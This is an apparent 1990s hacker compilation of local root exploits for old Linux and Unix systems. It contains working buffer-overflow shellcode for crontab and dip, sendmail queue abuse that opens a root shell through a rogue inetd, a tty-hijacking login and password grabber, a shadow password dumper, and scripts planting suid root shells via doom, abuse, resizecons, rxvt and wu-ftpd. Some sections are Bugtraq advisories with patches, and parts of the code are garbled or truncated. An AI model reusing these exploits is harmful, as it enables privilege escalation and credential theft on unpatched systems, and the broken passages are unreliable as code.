      . 1. vixie crontab buffer overflow for RedHat Linux                      .
      ..........................................................................
      
      If crontab is suid it is more then likely exploitable.
      
      
      -----------cut here
      
      /* vixie crontab buffer overflow for RedHat Linux
       *
       * I don't think too many people know that redhat uses vixie crontab.
       * I didn't find this, just exploited it.
       *
       *
       * Dave G. 
       * 10/13/96
       *
       */
       
      #include 
      #include 
      #include 
      #include 
      #include 
       
      #define DEFAULT_OFFSET          -1240
      #define BUFFER_SIZE             100     /* MAX_TEMPSTR is 100 */
      #define HAPPY_FILE              "./Window"
       
      long get_esp(void)
      {
         __asm__("movl %esp,%eax\n");
      }
       
      main(int argc, char **argv)
      {
         int fd;
         char *buff = NULL;
         unsigned long *addr_ptr = NULL;
         char *ptr = NULL;
        u_char execshell[] = 
         "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
         "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
         "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
       
       
        
      /*
       * The sscanf line reads for 'name' as %[^ =].  Neither a space, nor
       * a '=' character appears below
       */
       
         
         int i;
         int ofs = DEFAULT_OFFSET;
       
         /* if we have a argument, use it as offset, else use default */
         if(argc == 2)
            ofs = atoi(argv[1]);   
         else if (argc > 2) {
            fprintf(stderr, "egg [offset]\n");
            exit(-1);
         }
         /* print the offset in use */
         printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);
         
         buff = malloc(4096);
         if(!buff)
         {
            printf("can't allocate memory\n");
            exit(0);
         }
         ptr = buff;
         /* fill start of buffer with nops */
         memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
         ptr += BUFFER_SIZE-strlen(execshell);
         /* stick asm code into the buffer */
         for(i=0;i < strlen(execshell);i++) 
            *(ptr++) = execshell[i];
         
         addr_ptr = (long *)ptr;
         for(i=0;i < (878/4);i++)
            *(addr_ptr++) = get_esp() + ofs;
         ptr = (char *)addr_ptr;
         *ptr++ = '=';
         *ptr++ = 'X';
         *ptr++ = '\n';
         *ptr = 0;
         printf("Writing to %s\n", HAPPY_FILE);
       
      /*
       * The sleep is required because as soon as crontab opens the tmp file it
       * stat's and saves it.  After the EDITOR program exists it stats again
       * and if they are equal then it assumes changes weren't made and exits.
       */
         fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666);
         write (fd, buff, strlen(buff));
       
         close(fd);
       
         execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL); 
         /* Successful completion */
         exit(0);
      }
      ----------- cut here
      
      ..........................................................................
      .                                                                        .
      .  2. Root dip exploit                                                   .
      .                                                                        .
      ..........................................................................
      
      in /sbin you will find a symbolic link called dip to a suid root binary.
      Chances are, if this file is suid, it's sploitable.
      
      -------- cut here
      
      #include 
      #include 
      #include 
      #include 
      #include 
      #define PATH_DIP "/sbin/dip"
      u_char shell[] = 
      "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
      "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
      "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hs";
      u_long esp() { __asm__("movl %esp, %eax"); }
      main()
      {
        u_char buf[1024];
        u_long addr;
        int i, f;
      
        strcpy(buf, "chatkey ");
        addr = esp() - 192;
        for (i=8; i<128+16; i+=4)
          *((u_long *) (buf+i)) = addr;
        for (i=128+16; i<512; i++)
          buf[i] = 0x90;
        for (i=0; i
      #include 
      #include 
      #include 
      #ifdef NEWERKERNEL
      #include 
      #endif
      #define __KERNEL__
      #include 
      #include 
      
      static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);
      static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)
      
      
      #define KERNEL_BASE 0xc0000000
      /* ------------------------------------------------------------------------ */
      static __inline__ unsigned char
      __farpeek (int seg, unsigned ofs)
      {
        unsigned char res;
        asm ("mov %w1,%%gs ; gs; movb (%2),%%al"
             : "=a" (res)
             : "r" (seg), "r" (ofs));
        return res;
      }
      /* ------------------------------------------------------------------------ */
      static __inline__ void
      __farpoke (int seg, unsigned ofs, unsigned char b)
      {
        asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"
             : /* No results.  */
             : "r" (seg), "r" (ofs), "r" (b));
      }
      /* ------------------------------------------------------------------------ */
      void
      memgetseg (void *dst, int seg, const void *src, int size)
      {
        while (size-- > 0)
          *(char *)dst++ = __farpeek (seg, (unsigned)(src++));
      }
      /* ------------------------------------------------------------------------ */
      void
      memputseg (int seg, void *dst, const void *src, int size)
      {
        while (size-- > 0)
          __farpoke (seg, (unsigned)(dst++), *(char *)src++);
      }
      /* ------------------------------------------------------------------------ */
      int
      main ()
      {
        int stat, i,j,k;
        struct modify_ldt_ldt_s ldt_entry;
        FILE *syms;
        char line[100];
        struct task_struct **task, *taskptr, thistask;
        struct kernel_sym blah[4096];
      
        printf ("Bogusity checker for modify_ldt system call.\n");
      
        printf ("Testing for page-size limit bug...\n");
        ldt_entry.entry_number = 0;
        ldt_entry.base_addr = 0xbfffffff;
        ldt_entry.limit = 0;
        ldt_entry.seg_32bit = 1;
        ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
        ldt_entry.read_exec_only = 0;
        ldt_entry.limit_in_pages = 1;
        ldt_entry.seg_not_present = 0;
        stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
        if (stat)
          /* Continue after reporting error.  */
          printf ("This bug has been fixed in your kernel.\n");
        else
          {
            printf ("Shit happens: ");
            printf ("0xc0000000 - 0xc0000ffe is accessible.\n");
          }
      
        printf ("Testing for expand-down limit bug...\n");
        ldt_entry.base_addr = 0x00000000;
        ldt_entry.limit = 1;
        ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
        ldt_entry.limit_in_pages = 0;
        stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
        if (stat)
          {
            printf ("This bug has been fixed in your kernel.\n");
            return 1;
          }
        else
          {
            printf ("Shit happens: ");
            printf ("0x00000000 - 0xfffffffd is accessible.\n");
          }
      
        i = get_kernel_syms(blah);
        k = i+10;
        for (j=0; j = 0;                                     #set effective user id
      $ENV{'PATH'} = '/bin:/usr/bin';             #secure the session
      $ENV{'IFS'} = '' if $ENV{'IFS'} ne '';
      $execpath = "/bin/sh";                      #sameol sameol
      $execpath =~ /(.*)/;                        #untaint the variable
      $boom = $1;                                 #$boom untainted
      system $boom;                               #run EUID=0 shell
      
      ----------------cut here
      
      ..........................................................................
      .                                                                        .
      . 5. Abuse Sendmail 8.6.9                                                .
      .                                                                        .
      ..........................................................................
      
      -----------cut here
      /* smh.c - atreus - Michael R. Widner (2/27/95)
       *  
       * a quick hack to abuse sendmail 8.6.9 or whatever else is subject to this
       * hole.  It's really just a matter of passing newlines in arguments to
       * sendmail and getting the stuff into the queue files.  If we run this
       * locally with -odq we are guaranteed that it will be queue, rather than
       * processed immediately.
       * usage: smh [ username [/path/to/sendmail]]
       * It's worth noting that this is generally only good for getting bin.
      
       * sendmail still wants to process the sendmail.cf file, which contains
       * Ou1 and Og1 most of the time, limiting you to bin access.  Is there
       * a way around this?
       * cc -o smh smh.c should do the trick.  This just creates a bin owned
       * mode 6777 copy of /bin/sh in /tmp called /tmp/newsh.  Note that on some
       * systems this is pretty much worthless, but you're smart enough to know
       * which systems those are.  Aren't you?
      bash$ ./smh root /usr/lib/sendmail
      bash$ /usr/lib/sendmail -q
      */
      #include 
      #include    
      #include    
      
      /* Take Your Pick */
      #define EVIL_COMMAND1 "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777 /tmp/newsh\">\n$rascii "
      #define EVIL_COMMAND2 "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nR<\"|/bin/echo ingreslock stream tcp nowait root /bin/sh /bin/sh  >/tmp/.inetd.conf\">\nR<\"|/usr/sbin/inetd /tmp/.inetd.conf\">\n$rascii "
      
      main(argc, argv)
      int argc;
      char **argv;
      {                          
            execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p", EVIL_COMMAND1,
            argv[1] ? argv[1] : "atreus",0);
      }
      
      ----------- cut here
      ..........................................................................
      .                                                                        .
      . 6. ttysurf - grab someone's tty                                         .
      ..........................................................................
      
      ------------cut here
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      
      #define DEBUG 1         /* Enable additional debugging info (needed!) */
      #define USLEEP          /* Define this if your UNIX supports usleep() */
      
      #ifdef ULTRIX
      #define TCGETS TCGETP   /* Get termios structure */
      #define TCSETS TCSANOW  /* Set termios structure */
      #endif
      
      
      handler(signal)
      
                 int signal;             /* signalnumber */
      {                       /* do nothing, ignore the signal */
              if(DEBUG) printf("Ignoring signal %d\n",signal);
      }
      
      int readandpush(f,string)
      FILE *f;
      char *string;
      {
              char *cp,*result;
              int e;
              struct termios termios;
      
              result=fgets(string,20,f);    /* Read a line into string */
              if (result==NULL)
              {       perror("fgets()");
                      return(1);
              }
              if (DEBUG)
              {       printf("String: %s\n",string);
                      fflush(stdout);
              }
      
              ioctl(0,TCGETS,&termios);       /* These 3 lines turn off input echo */
       /*        echo = (termios.c_lflag & ECHO);      */
              termios.c_lflag=((termios.c_lflag | ECHO) - ECHO);
              ioctl(0,TCSETS,&termios);
      
              for (cp=string;*cp;cp++)        /* Push it back as input */
              {       e=ioctl(0,TIOCSTI,cp);
                      if(e<0)
                      {       perror("ioctl()");
                              return(1);
                      }
              }
              return(0);
      }
      
      main(argc,argv)
      int argc;
      char *argv[];
      {
              /* variables */
              int err;
              FILE *f;
              char *term      = "12345678901234567890";
              char *login     = "12345678901234567890";
              char *password  = "12345678901234567890";
              if (argc < 2)
              {       printf("Usage: %s /dev/ttyp?\nDon't forget to redirect the output to a file !\n",argv[0]);
                      printf("Enter ttyname: ");
                      gets(term);
              }
              else term=argv[argc-1];
      
              signal(SIGQUIT,handler);
              signal(SIGINT,handler);
              signal(SIGTERM,handler);
              signal(SIGHUP,handler);
              signal(SIGTTOU,handler);
      
              close(0);               /* close stdin */
      #ifdef ULTRIX
              if(setpgrp(0,100)==-1)
                      perror("setpgrp:");     /* Hopefully this works */
      #else
              if(setsid()==-1)
                      perror("setsid:"); /* Disconnect from our controlling TTY and
                                         start a new session as sessionleader */
      #endif
              f=fopen(term,"r");      /* Open tty as a stream, this guarantees
                                                 getting file descriptor 0 */
              if (f==NULL)
              {       printf("Error opening %s with fopen()\n",term);
                      exit(2);
              }
              if (DEBUG) system("ps -xu>>/dev/null &");
              fclose(f);              /* Close the TTY again */
              f=fopen("/dev/tty","r");        /* We can now use /dev/tty instead */
              if (f==NULL)
              {       printf("Error opening /dev/tty with fopen()\n",term);
                      exit(2);
              }
      
              if(readandpush(f,login)==0)
              {
      #ifdef USLEEP
                      usleep(20000);  /* This gives login(1) a chance to read the
                                         string, or the second call would read the
                                         input that the first call pushed back ! /*
      #else
                      for(i=0;i<1000;i++)
                              err=err+(i*i)
                                 /* error        /* Alternatives not yet implemented */
      #endif
                      readandpush(f,password);
                      printf("Result: First: %s Second: %s\n",login,password);
              }
      
              fflush(stdout);
              sleep(30);      /* Waste some time, to prevent that we send a SIGHUP
                                 to login(1), which would kill the user. Instead,
                                 wait a while. We then send SIGHUP to the shell of
                                 the user, which will ignore it. */
              fclose(f);
      }
      --------------cut here
      
      ..........................................................................
      .                                                                        .
      . 7. shadow.c  - Get shadow passwd files                                 .
      .                                                                        .
      ..........................................................................
      
      ----------- cut here
      
       /*  This source will/should print out SHADOWPW passwd files.   */
       
       struct  SHADOWPW {                              /* see getpwent(3) */
                char *pw_name;
                char *pw_passwd;
                int  pw_uid;
                int  pw_gid;
                int  pw_quota;
                char *pw_comment;
                char *pw_gecos;
                char *pw_dir;
                char *pw_shell;
       };
       struct passwd *getpwent(), *getpwuid(), *getpwnam();
       
       #ifdef   elxsis?
       
       /* Name of the shadow password file. Contains password and aging info */
       
       #define  SHADOWPW "/etc/shadowpw"
       #define  SHADOWPW_PAG "/etc/shadowpw.pag"
       #define  SHADOWPW_DIR "/etc/shadowpw.dir"
       /*
        *  Shadow password file pwd->pw_gecos field contains:
        *
        *  ,,,,
        *
        *        = Type of password criteria to enforce (type int).
        *             BSD_CRIT (0), normal BSD.
        *             STR_CRIT (1), strong passwords.
        *    = Password aging period (type long).
        *             0, no aging.
        *             else, number of seconds in aging period.
        *           = Time (seconds from epoch) of the last password
        *             change (type long).
        *             0, never changed.n
        *    = Time (seconds from epoch) that the current password
        *             was made the  (type long).
        *             0, never changed.ewromsinm
        *   = Password (encrypted) saved for an aging  to
        *             prevent reuse during that period (type char [20]).
        *             "*******", no .
        */
       
       /* number of tries to change an aged password */
       
       #define  CHANGE_TRIES 3
       
       /* program to execute to change passwords */
       
       #define  PASSWD_PROG "/bin/passwd"
       
       /* Name of the password aging exempt user names and max number of entires */
       
       #define  EXEMPTPW "/etc/exemptpw"
       #define MAX_EXEMPT 100
       
       /* Password criteria to enforce */
       
       #define BSD_CRIT 0     /* Normal BSD password criteria */
       #define STR_CRIT 1      /* Strong password criteria */
       #define MAX_CRIT 1
       #endif   elxsi
       #define NULL 0
       main()
       {
              struct passwd *p;
              int i;
              for (;1;) {;
                p=getpwent();
                if (p==NULL) return;
                printpw(p);
              }
       }
       
       printpw(a)
       struct SHADOWPW *a;
       {
              printf("%s:%s:%d:%d:%s:%s:%s\n",
                 a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid,
                 a->pw_gecos,a->pw_dir,a->pw_shell);
       }
       
       /* SunOS 5.0           /etc/shadow */
       /* SunOS4.1+c2     /etc/security/passwd.adjunct */
       
      ------------ cut here
      
      ..........................................................................
      .                                                                        .
      . 8. Abuse Root Exploit (linux game program)                             .
      .                                                                        .
      ..........................................................................
      
      ---------- cut here
      
      There is a security hole in RedHat 2.1, which installs the game abuse,
      /usr/lib/games/abuse/abuse.console suid root.  The abuse.console program
      loads its files without absolute path names, assuming the user is running
      abuse from the /usr/lib/games/abuse directory.  One of these files in the
      undrv program, which abuse executes as root.  If the user is not in the
      abuse directory when running this, an arbitrary program can be substituted
      for undrv, allowing the user to execute arbitrary commands as root. 
         If abuse.console needs to be run by users other than root at the console,
      provisions need to be made in the code to not execute or load any files
      as root.
      
                         Program: /usr/lib/games/abuse/abuse.console suid root
      Affected Operating Systems: Red Hat 2.1 linux distribution
                    Requirements: account on system
                           Patch: chmod -s /usr/lib/games/abuse/abuse.console
             Security Compromise: root
                          Author: Dave M. (davem@cmu.edu)
                        Synopsis: abuse.console runs undrv without an absolute
                                  pathname while executing as root, allowing
                                  a user to substitute the real undrv with 
                                  an arbitrary program.
      
      Exploit:
      #!/bin/sh
      #
      # abuser.sh
      # exploits a security hole in abuse to create
      # a suid root shell /tmp/abuser on a linux
      # Red Hat 2.1 system with the games package 
      # installed.
      #
      # For release 2/2/96 - 1 drink credit please.
      #
      # by Dave M. (davem@cmu.edu)
      #
      echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system
      echo ================ Checking system vulnerability
      if test -u /usr/lib/games/abuse/abuse.console
      then
      echo ++++++++++++++++ System appears vulnerable.
      cd /tmp
      cat << _EOF_ > /tmp/undrv
      #!/bin/sh
      /bin/cp /bin/sh /tmp/abuser
      /bin/chmod 4777 /tmp/abuser
      _EOF_
      cat << _EOF_ >> /tmp/the_wall
      so ya thought ya might like to go to the show
      to feel the warm thrill of confusion that space cadet glow
      tell me is something eluding you sunshine?
      is this not what you expected to see?
      if you wanna find out what's behind these cold eyes
      you'll just have to claw your way through this disguise
      _EOF_
      chmod +x /tmp/undrv
      PATH=/tmp
      echo ================ Executing Abuse
      /usr/lib/games/abuse/abuse.console
      /bin/rm /tmp/undrv
      /bin/rm /tmp/the_wall
      if test -u /tmp/abuser
      then
      echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser
      else
      echo ---------------- Exploit failed
      fi
      else
      echo ---------------- This machine does not appear to be vulnerable.
      fi
      ----------- cut here
      
      ..........................................................................
      .                                                                        .
      . 9. Doom (game) root exploit - makes suid root shell                    .
      .                                                                        .
      ..........................................................................
      
      
      ----------- Start reading
      From bo@ebony.iaehv.nl Tue Dec 17 18:53:18 1996
      Date: Tue, 17 Dec 1996 10:18:24 +0100
      From: Bo 
      To: Multiple recipients of list BUGTRAQ 
      Subject: Re: Linux: killmouse/doom
      
      > From: Joe Zbiciak 
      > Subject:      Re: Linux: exploit for killmouse.
      >
      > Which reminds me, there's a bigger hole in Doom.  It doesn't drop its
      > root permissions soon enough!  The user is allowed to set a sound server
      > in his/her .doomrc.  Normally, this is set to "sndserver".  Howver, this
      > can be set to *any* program, and that program runs as root!!
      
      Yes,  very true. And just in case anybody collects these scripts, here's
      the obvious one:
      
      ------------ CUT HERE --------------
      #!/bin/sh
      # Tue Dec 17 10:02:20 MET 1996 Bo
      echo 'sndserver "/tmp/sndserver"' > .doomrc
      cat > /tmp/sndserver.c << EOF
      #include 
      #include 
      main() {
              if (fork()) while (getc(stdin));
              else system("cp /bin/sh /tmp; chmod +s /tmp/sh");
                      /* or whatever you like to do */
      }
      EOF
      gcc /tmp/sndserver.c -o /tmp/sndserver
      
      ------------ CUT HERE --------------
      
      The  fork()  is  just so that doom runs on nicely without locking up the
      keyboard  and  sndserver  gobbles  up all the sound data send to it. Run
      the script, start sdoom, quit the normal way, and execute /tmp/sh.
      
      Thanks for pointing it out, Joe.
      
      Regards,
                      Bo.
      
      --
                      "Heisenberg may have been here".
      
      --------------- end of read
      
      ..........................................................................
      .                                                                        .
      . 10. dosmenu suid root exploit                                          .
      .                                                                        .
      ..........................................................................
      
      
      --------- read
      
      In Debian 1.1, the optional DOSEMU package installs /usr/sbin/dos
      setuid root.  This is a serious security hole which can be exploited
      to gain access to any file on the system.
      
      Package: dosemu
      Version: 0.64.0.2-9
      
      ------- start of cut text --------------
      
      $ cat /etc/debian_version 
      1.1
      $ id
      uid=xxxx(quinlan) gid=xxxx(quinlan) groups=xxxx(quinlan),20(dialout),24(cdrom)
      [quinlan:~]$ ls -al /usr/bin/dos
      -rwsr-xr-x   1 root     root       569576 Oct 24 00:05 /usr/bin/dos
      $ ls -al /root/foo
      -rw-------   1 root     root         1117 Nov 13 23:10 /root/foo
      $ dos -F /root/foo
      [ Prints /root/foo, which is not readable by user `quinlan'. ]
      
      ------- Cut here
      
      I expect there may be other holes in dosemu other than this one that
      can be exploited if it is installed setuid root.  It took about 60
      seconds to find this hole once I realized /usr/bin/dos was setuid
      root.
      
      Dan
      
      Note: This security hole can be corrected by removing the suid bit from
      /usr/bin/dos:
      ----------------------------
      $ chmod u-s /usr/bin/dos
      ----------------------------
      
      Jonathan
      
      ----------- end of read
      
      ..........................................................................
      .                                                                        .
      . 11. Doom root killmouse exploit                                        .
      .                                                                        .
      ..........................................................................
      
      System:
      Probably  Linux  specific.  Slackware  3.0 (installs Linux 1.2.13) which
      have  gpm  utility  and/or  the  Doom  package installed are vulnerable.
      Other distributions might be too.
      
      Impact:
      Local users can acquire root status.
      
      Background:
      The  problem  is  the  killmouse/startmouse command that is part of Doom
      package  on  Linux  systems.  It  is  actually a C-wrapper that runs two
      scripts  (killmouse.sh/startmouse.sh). It runs suid root.
      
      Problem:
      I would try to describe the problem but I can't stop laughing.
      
      Exploit:
      This  can  be  exploited  in  a few similar ways. Here's just one. Let's
      assume  the  gpm  utility is not running. We can't start it up ourselves
      as gpm is only to be run by root. So we'll use startmouse to fire it up:
      
      $ touch /tmp/gpmkilled
      $ /usr/games/doom/startmouse
      
      ps -aux | grep gpm
      bo        1436  0.0  2.0   40  312 v03 R    16:33   0:00 grep gpm
      root      1407  0.0  2.4   42  368  ?  S    16:24   0:00 /usr/bin/gpm t ms
      
      Fine,  it's  running.  Now  we'll use killmouse to kill the process, but
      first we set our umask to 0 and link /tmp/gpmkilled to /root/.rhosts:
      
      $ umask 0
      $ ln -s /root/.rhosts /tmp/gpmkilled
      $ /usr/games/doom/killmouse
       1407  ?  S     0:00 gpm t ms
      
      $ ls -l /root/.rhosts
      -rw-rw-rw-   1 root     users           0 Dec 13 16:44 /root/.rhosts
      
      $ echo localhost bo > /root/.rhosts
      $ rsh -l root localhost sh -i
      bash#
      
      Bingo.  On  some  systems gpm might not be started in /etc/rc.d/rc.local
      so  the  startmouse  script will fail. But gpm might be running already.
      If  neither of these conditions are met, note that startmouse.sh creates
      /tmp/gpmscript  and runs it in a shell. There's a window of time between
      creating  the  script and executing it, so we have a nice race condition
      here; it can be replaced with anything you like prior to execution.
      
      Solution:
      Remove  setuid  bits  of  killmouse/startmouse.  Better yet - nuke them.
      While your at it, nuke Doom too - it's a stupid game anyway :-)
      
      Best regards,
                      Bo (bo@ebony.iaehv.nl)
      
      
      killmouse exploit
      ------------------ cut here
      
      /usr/games/doom/startmouse.sh:
      #!/bin/sh
      if [ -r /tmp/gpmkilled ]; then
        /usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
        /bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
      fi
      
      /usr/games/doom/killmouse.sh:
      #!/bin/sh
      if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
        GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
      fi
      
      ----------- cut here
      
      ..........................................................................
      .                                                                        .
      . 12. Root exploit for resize icons                                      .
      .                                                                        .
      ..........................................................................
      
      There is a security hole in RedHat 2.1, which installs the program
      /usr/bin/resizecons suid root.  The resizecons program allows a user
      to change the videmode of the console.  During this process, it runs
      the program restoretextmode without an absolute pathname, assuming the
      correct version will be found in the path, while running with root
      privileges.  It then executes setfont in the same manner.  By setting
      the path to find a rogue restoretextmode, a user can execute an arbitrary
      program as root.
      
      As a more amusing aside, the file /tmp/selection.pid is read and the
      pid contained within is sent a SIGWINCH, allowing a user on the system
      to force a redraw of the screen to an arbitrary process (that handles 
      SIGWINCH calls) on the machine. 
      
      If /usr/bin/resizecons needs to be run by users other than root at the
      console, provisions need to be made in the code to execute the outside
      utilities with absolute pathnames, and to check access rights on files
      before opening.
      
                         Program: /usr/bin/resizecons
      Affected Operating Systems: Red Hat 2.1 linux distribution
                    Requirements: account on system
                 Temporary Patch: chmod -s /usr/bin/resizecons
             Security Compromise: root
                          Author: Dave M. (davem@cmu.edu)
                        Synopsis: resizecons runs restoretextmode without an
                                  absolute pathname while executing as root,
                                  allowing a user to substitute the real
                                  program with arbitrary commands.
      
      
      ----------cut here
      wozzeck.sh:
      #!/bin/sh
      #
      # wozzeck.sh
      # exploits a security hole in /usr/bin/resizecons 
      # to create a suid root shell in /tmp/wozz on a 
      # linux Red Hat 2.1 system.
      #
      # by Dave M. (davem@cmu.edu)
      # 
      echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
      echo ================ Checking system vulnerability
      if test -u /usr/bin/resizecons
      then
      echo ++++++++++++++++ System appears vulnerable.
      cd /tmp
      cat << _EOF_ > /tmp/313x37
      This exploit is dedicated to 
      Wozz.  Use it with care.
      _EOF_
      cat << _EOF_ > /tmp/restoretextmode
      #!/bin/sh
      /bin/cp /bin/sh /tmp/wozz
      /bin/chmod 4777 /tmp/wozz
      _EOF_
      /bin/chmod +x /tmp/restoretextmode
      PATH=/tmp
      echo ================ Executing resizecons
      /usr/bin/resizecons 313x37
      /bin/rm /tmp/restoretextmode
      /bin/rm /tmp/313x37
      if test -u /tmp/wozz
      then
      echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
      else
      echo ---------------- Exploit failed
      fi
      else
      echo ---------------- This machine does not appear to be vulnerable.
      fi
      
      -------------- cut here
      
      ..........................................................................
      .                                                                        .
      . 13. Root console exploit for restorefont                               .
      .                                                                        .
      ..........................................................................
      
      Linux 'restorefont' Security Holes
      by FEH Staff
      
      Linux's svgalib utilities, required to be suid root, have a problem in that
      they do not revoke suid permissions before reading a file.  This is exploited
      in the restorefont utility, but similar bugs exist in other svgalib utilities.
      The restorefont utility serves two functions.  First, it will read a font from
      a file and write it to the console as the font.  Second, it will read a font
      from the console and write it out to a file.  Luckily, the specific bug
      in restorefont can only be exploited if someone is at the console, reducing
      its overall impact on the security of the system as a whole.
      
      In writing the utilities, the authors are cognizant of the fact that when
      writing out the font, suid permissions must first be given up; it is in fact
      commented as such in the code.  However, when reading in a font, the program
      is still running with full suid root permissions.  This allows us to read in
      any file for the font that root could access (basically, anything).
      
      The applicable code to read in the file is shown below:
      
      #define FONT_SIZE 8192
      unsigned char font[FONT_SIZE];
      
              if (argv[1][1] == 'r') {
                      FILE *f;
                      f = fopen(argv[2], "rb");
                      if (f == NULL) {
                              error:
                              perror("restorefont");
                              exit(1);
                      }
                      if(1!=fread(font, FONT_SIZE, 1, f))
                              {
                              if(errno)
                                      goto error;
                              puts("restorefont: input file corrupted.");
                              exit(1);
                              }
                      fclose(f);
      
      We can see from this that the file to be read in has to be at least 8k,
      as if it is not, the program will produce an error and exit.  If the file
      is at least 8k, the first 8k are read into the buffer, and the program 
      proceeds to set whatever the contents of the file are to the font:
              vga_disabledriverreport();
              vga_setchipset(VGA);            /* avoid SVGA detection */
              vga_init();
              vga_setmode(G640x350x16);
              vga_puttextfont(font);
              vga_setmode(TEXT);
      
      At this point, the console will now look quite unreadable if you are
      reading something other than a font from that file.  But, the data that
      is put into the font is left untouched and is readable using the -w option
      of restorefont.  We then read the font back from video memory to a new file,
      and our job is complete, we have read the first 8k of a file we shouldn't
      have had access to.  To prevent detection of having run this, we probably
      shouldn't leave an unreadable font on the screen, so we save and then restore
      the original font before reading from the file.
      The complete exploit is shown below:
      
                         Program: restorefont, a svgalib utility
      Affected Operating Systems: linux
                    Requirements: logged in at console
             Security Compromise: user can read first 8k of any file of at least
                                  8k in size on local filesystems
                        Synopsis: restorefont reads a font file while suid root,
                                  writing it to video memory as the current vga
                                  font; anyone at console can read the current
                                  font to a file, allowing you to use video memory
                                  as an 8k file buffer.
      
      -------------
      rfbug.sh:
      --------------------cut here
      #!/bin/sh
      restorefont -w /tmp/deffont.tmp
      restorefont -r $1
      restorefont -w $2
      restorefont -r /tmp/deffont.tmp
      rm -f /tmp/deffont.tmp
      -----------------------------------cut here
      
      ..........................................................................
      .                                                                        .
      . 14. Root rxvt X server exploit                                         .
      .                                                                        .
      ..........................................................................
      
      Program: rxvt
      Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
                                  rxvt suid root (and compiled with PRINT_PIPE)
                    Requirements: account on system, X server
                 Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
             Security Compromise: root
                          Author: Dave M. (davem@cmu.edu)
                        Synopsis: rxvt fails to give up root privileges before
                                  opening a pipe to a program that can be specified
                                  by the user.
      
      
      Exploit:
      1.  Set DISPLAY environment variable if necessary so you can use x clients.
      2.  In user shell:
          $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
          $ chmod +x /tmp/rxbug
          $ rxvt -print-pipe /tmp/rxbug
      3.  In rxvt xclient:
          $ cat
            ESC[5i
            ESC[4i
          (The client will close at this point with a broken pipe)
      4.  $ /tmp/rxsh
          # whoami
          root
          #
      
      ..........................................................................
      .                                                                        .
      .15. Root wuftpd exploit                                                 .
      ..........................................................................
      
      The following is gleaned from the BugTraq mailing list:
      -------------------------------------------------------
      Since Bugtraq is exceptionally quiet lately, I though I should make it
      come alive again with this discussion of the bug that was reported in
      the wu.ftpd that comes with some Slackware distributions of Linux.
      The report was just before Bugtraq went down for a long time, but
      I've found the bug still to be present on all the Linux machines that
      I have access to. So maybe it needs to be brought a little more in
      the open. Here we go:
      
      ObBug: - Short description of the bug
      
      It involves wu.ftpd being misconfigured at compile time and allowing
      SITE EXEC access to /bin (for anonymous or otherwise chroot-ed users
      this is ~ftp/bin). Now if in this /bin resides a program that gives
      access to executables outside /bin, but in the users reach (such as
      /bin/bash that gives access to the user's homedir), this opens up
      a root vulnerability. This should have been set to /bin/ftp-exec and
      which be set by the _PATH_EXECPATH variable in src/pathnames.h before
      compiling. The wu-ftpd-2.4_linux.tgz that I found somewhere on the
      net has this securely set as default value.
      
      - How to check ?
      
      $ ftp -n localhost
      user: 
      password: 
      ftp> quote site exec bash -c id
      
      If vulnerable it gives here: uid=0, gid=0, euid=, egid=
      
      Of course, bash should not be available at all
      
      - How to exploit (in case your sysadmin or you think the above is not
        a problem)
      
      go to your homedir and make a program: duh.c (or whatever)
      
      main() {
         seteuid(0);
         setegid(0);
         system("/bin/cp /bin/sh ./sh");
         system("/bin/chmod 6755 ./sh");
      }
      
      $ make duh
      $ ftp -n localhost (and login)
      user: 
      password: 
      ftp> quote site exec bash -c duh
      ftp> quit
      
      $ ./sh
      
      bash#
      
      (voila, QED)
      
      - How to fix?
      
      Get the source of wu-ftpd-2.4.linux.tar.gz (stock wu-ftpd-2.4 from wuarchive
      doesn't compile on linux) and compile it; you might want to define the
      _PATH_PIDNAMES and _PATH_XFERLOG to other values there...(/usr/adm/ftp.pids-%s
      and /usr/adm/xferlog for example). If you cannot find that I can email the
      source to you,...if you trust the source I took somewhere unmodified and
      if you trust me ;-) An arch search for wu-ftpd-2.4 will give you sites too.
      I can remember that I got it that way.
      
      $) Henri Karrenbeld
      -----------------------------------------------------------------------------
      Hardware, n.:
              The parts of a computer system that can be kicked.
